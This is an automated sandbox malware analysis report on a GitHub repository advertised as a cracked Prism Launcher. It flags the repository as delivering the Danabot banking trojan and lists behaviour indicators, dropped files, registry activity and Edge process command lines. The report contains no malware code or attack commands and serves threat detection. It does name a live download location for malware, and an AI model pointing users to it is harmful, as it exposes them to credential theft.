Malware Analysis Report

2025-05-05 21:44

Sample ID: 250420-xtsbjassat
Target: http://github.com/Diegiwg/PrismLauncher-Cracked
Tags: danabot banker discovery trojan
Score: 10/10

Analysis Overview

Score: 10/10

Threat Level: Known bad

The file http://github.com/Diegiwg/PrismLauncher-Cracked was found to be: Known bad.

Malicious Activity Summary

danabot banker discovery trojan

Danabot

Danabot family

Process spawned unexpected child process

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2025-04-20 19:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2025-04-20 19:09

Reported: 2025-04-20 19:19

Platform: win10v2004-20250314-en

Max time kernel: 597s

Max time network: 601s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://github.com/Diegiwg/PrismLauncher-Cracked

Signatures

Danabot

trojan banker danabot

Danabot family

danabot

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification_fast.bundle.js.LICENSE.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-sv.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\sv\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Wallet-Checkout\load-ec-i18n.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_536417775\_platform_specific\win_x64\widevinecdm.dll C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_951548711\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_96667937\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-da.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\zh-Hant\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-checkout-eligible-sites.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\bnpl\bnpl.bundle.js.LICENSE.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1825005940\keys.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-cy.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-fr.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-hr.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\fr-CA\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-shared-components\ko\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1825005940\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\zh-Hans\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-notification-config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-tk.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\id\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-shared-components\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1090327237\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\app-setup.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_536417775\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-et.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-ru.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\de\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\pt-BR\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-te.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\driver-signature.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\ja\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-mul-ethi.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\ko\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\ar\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Wallet-BuyNow\wallet-buynow.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_780230892\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-el.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-eu.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-uk.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_833700207\Part-RU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-tokenized-card\id\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-checkout\checkoutdata.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1476549494\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\fi\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\en-GB\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\pt-PT\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\it\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-shared-components\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-tokenization-config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-bn.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\DanaBot.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\DanaBot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896497873015393" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{B9CD01C3-958F-485E-A393-29681CD2EB1C} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5616 wrote to memory of 5560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 5792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://github.com/Diegiwg/PrismLauncher-Cracked

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2d8,0x7ffe536ef208,0x7ffe536ef214,0x7ffe536ef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1944,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2220,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2612,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4988,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5240,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3424 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5428,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5440 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5864,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5864,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4792,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6000,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5884,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6272,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6312,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6188,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3076 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4336,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=5576,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3428,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3704 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6428,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4996,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:8

